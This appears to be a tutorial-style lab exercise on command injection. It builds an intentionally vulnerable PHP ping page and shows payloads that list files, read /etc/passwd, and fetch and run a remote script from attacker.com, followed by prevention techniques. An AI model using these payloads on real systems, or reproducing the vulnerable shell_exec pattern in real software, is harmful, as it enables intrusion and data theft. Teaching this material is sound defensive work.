Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 11: Command Injection

by | Jan 21, 2025

Objective

Learn how to exploit Command Injection vulnerabilities to execute arbitrary system commands through a web application and understand how to prevent such attacks using secure coding practices.

Scenario

You are performing a security assessment on a web application that allows users to check if a specific server is reachable via the ping command. Due to improper input validation, the application is vulnerable to Command Injection, allowing attackers to execute arbitrary system commands on the server.

Lab Setup

Prerequisites:

  • Basic knowledge of PHP, Linux commands, and web security.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

PHP Script for the Ping Functionality

Create a file ping.php: 

<?php
if (isset($_GET['host'])) {
    $host = $_GET['host'];
    $output = shell_exec("ping -c 2 " . $host);
    echo "<pre>$output</pre>";
}
?>

<form method="GET" action="">
    Hostname/IP: <input type="text" name="host" required>
    <button type="submit">Ping</button>
</form>

Running the Application

  • Start the Apache server.
  • Place ping.php in the web server’s root directory (htdocs for XAMPP).
  • Open http://localhost/ping.php in your browser.

Exploitation Steps

Step 1: Testing for Command Injection

Enter a valid hostname in the input field: 

127.0.0.1

Inject a command using ; or |: 

127.0.0.1; ls

or 

127.0.0.1 | whoami

Expected Result:

  • The output of the ls or whoami command is displayed, confirming arbitrary command execution.

Step 2: Advanced Exploitation

Retrieve sensitive files: 

127.0.0.1; cat /etc/passwd

Download and execute a malicious script (if outbound traffic is allowed): 

127.0.0.1; wget http://attacker.com/shell.sh | bash

Solution and Prevention

Problem Analysis

  • User input is directly passed into the shell_exec function without validation or sanitization.

Fixing the Vulnerability

Use Escaping Functions

Escape shell arguments to prevent injections: 

$host = escapeshellarg($_GET['host']);
$output = shell_exec("ping -c 2 $host");

Validate User Input

Allow only valid hostnames/IP addresses: 

if (preg_match('/^[a-zA-Z0-9\.\-]+$/', $_GET['host'])) {
    $host = escapeshellarg($_GET['host']);
    $output = shell_exec("ping -c 2 $host");
    echo "<pre>$output</pre>";
} else {
    echo "<h2>Invalid input detected.</h2>";
}

Use Safer Alternatives to shell_exec

Replace shell_exec with safer functions or APIs. 

$output = system("ping -c 2 " . escapeshellarg($_GET['host']));

Run Applications with Least Privilege

Ensure the web server runs with limited permissions to minimize damage from successful attacks.

Disable Dangerous PHP Functions

Disable functions like exec(), shell_exec(), and system() in php.ini: 

disable_functions = exec, shell_exec, system, passthru, popen

Testing After Fix

Attempt to inject commands after implementing input validation: 

127.0.0.1; ls

Expected Result:

The application blocks the command and only allows valid hostnames.

Conclusion

In this lab, you exploited a Command Injection vulnerability by injecting arbitrary system commands through user input. You also learned how to secure applications using input validation, escaping functions, and secure server configurations to prevent such vulnerabilities.

0 Comments